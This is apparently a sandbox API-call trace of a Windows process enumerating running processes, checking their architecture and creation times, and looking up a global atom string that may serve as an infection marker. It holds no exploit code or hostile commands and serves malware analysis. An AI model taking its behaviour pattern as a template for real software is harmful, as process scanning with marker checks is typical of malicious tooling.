	[0123.057] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.057] CloseHandle (hObject=0x2dc) returned 1
	[0123.058] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.058] CloseHandle (hObject=0x2dc) returned 1
	[0123.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16c58) returned 0xc0000004
	[0123.125] VirtualAlloc (lpAddress=0x0, dwSize=0x16d58, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0123.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16d58, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0123.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.128] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.128] CloseHandle (hObject=0x424) returned 1
	[0123.129] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.129] CloseHandle (hObject=0x424) returned 1
	[0123.129] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.129] CloseHandle (hObject=0x424) returned 1
	[0123.129] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.129] CloseHandle (hObject=0x424) returned 1
	[0123.129] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.129] CloseHandle (hObject=0x424) returned 1
	[0123.129] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.129] CloseHandle (hObject=0x424) returned 1
	[0123.130] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.130] CloseHandle (hObject=0x424) returned 1
	[0123.130] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.130] CloseHandle (hObject=0x424) returned 1
	[0123.130] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.130] CloseHandle (hObject=0x424) returned 1
	[0123.130] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.130] CloseHandle (hObject=0x424) returned 1
	[0123.130] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.131] CloseHandle (hObject=0x424) returned 1
	[0123.131] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.131] CloseHandle (hObject=0x424) returned 1
	[0123.131] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.131] CloseHandle (hObject=0x424) returned 1
	[0123.131] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.131] CloseHandle (hObject=0x424) returned 1
	[0123.132] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.132] CloseHandle (hObject=0x424) returned 1
	[0123.132] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.132] CloseHandle (hObject=0x424) returned 1
	[0123.132] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.132] CloseHandle (hObject=0x424) returned 1
	[0123.132] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.132] CloseHandle (hObject=0x424) returned 1
	[0123.132] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.133] CloseHandle (hObject=0x424) returned 1
	[0123.133] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.133] CloseHandle (hObject=0x424) returned 1
	[0123.133] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.133] CloseHandle (hObject=0x424) returned 1
	[0123.133] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.133] CloseHandle (hObject=0x424) returned 1
	[0123.133] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.133] CloseHandle (hObject=0x424) returned 1
	[0123.133] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.134] CloseHandle (hObject=0x424) returned 1
	[0123.134] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.134] CloseHandle (hObject=0x424) returned 1
	[0123.134] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.134] CloseHandle (hObject=0x424) returned 1
	[0123.134] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.134] CloseHandle (hObject=0x424) returned 1
	[0123.134] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.134] CloseHandle (hObject=0x424) returned 1
	[0123.135] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.135] CloseHandle (hObject=0x424) returned 1
	[0123.135] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.135] CloseHandle (hObject=0x424) returned 1
	[0123.135] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.135] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.135] GetProcessTimes (in: hProcess=0x424, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.136] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.136] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.136] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.136] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.136] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.137] CloseHandle (hObject=0x424) returned 1
	[0123.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.137] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.137] CloseHandle (hObject=0x424) returned 1
	[0123.137] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.137] CloseHandle (hObject=0x424) returned 1
	[0123.137] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.137] CloseHandle (hObject=0x424) returned 1
	[0123.137] IsWow64Process (in: hProcess=0x424, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.137] CloseHandle (hObject=0x424) returned 1
	[0123.189] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.190] CloseHandle (hObject=0x6ac) returned 1
	[0123.190] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.190] CloseHandle (hObject=0x6ac) returned 1
	[0123.190] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.190] CloseHandle (hObject=0x6ac) returned 1
	[0123.190] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.190] CloseHandle (hObject=0x6ac) returned 1
	[0123.190] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.190] CloseHandle (hObject=0x6ac) returned 1
	[0123.191] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.191] CloseHandle (hObject=0x6ac) returned 1
	[0123.196] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.196] CloseHandle (hObject=0x6ac) returned 1
	[0123.196] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.196] CloseHandle (hObject=0x6ac) returned 1
	[0123.196] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.196] CloseHandle (hObject=0x6ac) returned 1
	[0123.196] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.196] CloseHandle (hObject=0x6ac) returned 1
	[0123.196] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.197] CloseHandle (hObject=0x6ac) returned 1
	[0123.198] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.198] CloseHandle (hObject=0x6ac) returned 1
	[0123.198] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.198] CloseHandle (hObject=0x6ac) returned 1
	[0123.198] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.198] CloseHandle (hObject=0x6ac) returned 1
	[0123.198] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.198] CloseHandle (hObject=0x6ac) returned 1
	[0123.199] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.199] CloseHandle (hObject=0x6ac) returned 1
	[0123.199] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.199] CloseHandle (hObject=0x6ac) returned 1
	[0123.199] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.199] CloseHandle (hObject=0x6ac) returned 1
	[0123.199] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.199] CloseHandle (hObject=0x6ac) returned 1
	[0123.200] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.200] CloseHandle (hObject=0x6ac) returned 1
	[0123.200] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.200] CloseHandle (hObject=0x6ac) returned 1
	[0123.200] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.200] CloseHandle (hObject=0x6ac) returned 1
	[0123.200] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.200] CloseHandle (hObject=0x6ac) returned 1
	[0123.200] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.200] CloseHandle (hObject=0x6ac) returned 1
	[0123.201] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.201] CloseHandle (hObject=0x6ac) returned 1
	[0123.201] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.201] CloseHandle (hObject=0x6ac) returned 1
	[0123.201] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.201] CloseHandle (hObject=0x6ac) returned 1
	[0123.201] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.201] CloseHandle (hObject=0x6ac) returned 1
	[0123.202] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.202] CloseHandle (hObject=0x6ac) returned 1
	[0123.202] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.202] CloseHandle (hObject=0x6ac) returned 1
	[0123.202] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.203] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.203] GetProcessTimes (in: hProcess=0x6ac, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.203] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.203] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.203] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.204] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.204] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.204] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.204] CloseHandle (hObject=0x6ac) returned 1
	[0123.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.204] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.204] CloseHandle (hObject=0x6ac) returned 1
	[0123.204] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.204] CloseHandle (hObject=0x6ac) returned 1
	[0123.205] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.205] CloseHandle (hObject=0x6ac) returned 1
	[0123.205] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.205] CloseHandle (hObject=0x6ac) returned 1
	[0123.205] IsWow64Process (in: hProcess=0x6ac, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.206] CloseHandle (hObject=0x6ac) returned 1
	[0123.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.258] CloseHandle (hObject=0x69c) returned 1
	[0123.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.258] CloseHandle (hObject=0x69c) returned 1
	[0123.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.258] CloseHandle (hObject=0x69c) returned 1
	[0123.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.258] CloseHandle (hObject=0x69c) returned 1
	[0123.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.259] CloseHandle (hObject=0x69c) returned 1
	[0123.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.259] CloseHandle (hObject=0x69c) returned 1
	[0123.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.259] CloseHandle (hObject=0x69c) returned 1
	[0123.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.259] CloseHandle (hObject=0x69c) returned 1
	[0123.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.260] CloseHandle (hObject=0x69c) returned 1
	[0123.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.260] CloseHandle (hObject=0x69c) returned 1
	[0123.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.260] CloseHandle (hObject=0x69c) returned 1
	[0123.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.260] CloseHandle (hObject=0x69c) returned 1
	[0123.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.261] CloseHandle (hObject=0x69c) returned 1
	[0123.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.261] CloseHandle (hObject=0x69c) returned 1
	[0123.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.261] CloseHandle (hObject=0x69c) returned 1
	[0123.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.261] CloseHandle (hObject=0x69c) returned 1
	[0123.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.262] CloseHandle (hObject=0x69c) returned 1
	[0123.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.262] CloseHandle (hObject=0x69c) returned 1
	[0123.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.262] CloseHandle (hObject=0x69c) returned 1
	[0123.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.262] CloseHandle (hObject=0x69c) returned 1
	[0123.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.263] CloseHandle (hObject=0x69c) returned 1
	[0123.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.263] CloseHandle (hObject=0x69c) returned 1
	[0123.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.263] CloseHandle (hObject=0x69c) returned 1
	[0123.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.263] CloseHandle (hObject=0x69c) returned 1
	[0123.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.263] CloseHandle (hObject=0x69c) returned 1
	[0123.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.264] CloseHandle (hObject=0x69c) returned 1
	[0123.264] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.264] CloseHandle (hObject=0x69c) returned 1
	[0123.264] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.264] CloseHandle (hObject=0x69c) returned 1
	[0123.264] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.264] CloseHandle (hObject=0x69c) returned 1
	[0123.264] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.264] CloseHandle (hObject=0x69c) returned 1
	[0123.265] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.265] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.265] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.266] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.266] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.266] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.266] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.266] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.267] CloseHandle (hObject=0x69c) returned 1
	[0123.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.267] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.267] CloseHandle (hObject=0x69c) returned 1
	[0123.267] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.267] CloseHandle (hObject=0x69c) returned 1
	[0123.267] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.267] CloseHandle (hObject=0x69c) returned 1
	[0123.267] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.268] CloseHandle (hObject=0x69c) returned 1
	[0123.268] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.268] CloseHandle (hObject=0x69c) returned 1
	[0123.301] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.301] CloseHandle (hObject=0x69c) returned 1
	[0123.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.302] CloseHandle (hObject=0x69c) returned 1
	[0123.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.302] CloseHandle (hObject=0x69c) returned 1
	[0123.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.302] CloseHandle (hObject=0x69c) returned 1
	[0123.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.302] CloseHandle (hObject=0x69c) returned 1
	[0123.302] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.303] CloseHandle (hObject=0x69c) returned 1
	[0123.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.303] CloseHandle (hObject=0x69c) returned 1
	[0123.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.303] CloseHandle (hObject=0x69c) returned 1
	[0123.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.303] CloseHandle (hObject=0x69c) returned 1
	[0123.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.303] CloseHandle (hObject=0x69c) returned 1
	[0123.303] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.304] CloseHandle (hObject=0x69c) returned 1
	[0123.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.304] CloseHandle (hObject=0x69c) returned 1
	[0123.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.304] CloseHandle (hObject=0x69c) returned 1
	[0123.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.304] CloseHandle (hObject=0x69c) returned 1
	[0123.304] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.304] CloseHandle (hObject=0x69c) returned 1
	[0123.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.305] CloseHandle (hObject=0x69c) returned 1
	[0123.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.305] CloseHandle (hObject=0x69c) returned 1
	[0123.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.305] CloseHandle (hObject=0x69c) returned 1
	[0123.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.305] CloseHandle (hObject=0x69c) returned 1
	[0123.305] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.305] CloseHandle (hObject=0x69c) returned 1
	[0123.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.306] CloseHandle (hObject=0x69c) returned 1
	[0123.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.306] CloseHandle (hObject=0x69c) returned 1
	[0123.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.306] CloseHandle (hObject=0x69c) returned 1
	[0123.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.306] CloseHandle (hObject=0x69c) returned 1
	[0123.306] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.306] CloseHandle (hObject=0x69c) returned 1
	[0123.307] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.307] CloseHandle (hObject=0x69c) returned 1
	[0123.307] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.307] CloseHandle (hObject=0x69c) returned 1
	[0123.307] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.307] CloseHandle (hObject=0x69c) returned 1
	[0123.308] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.308] CloseHandle (hObject=0x69c) returned 1
	[0123.308] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.308] CloseHandle (hObject=0x69c) returned 1
	[0123.308] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.308] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.308] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.309] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.309] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.309] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.310] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
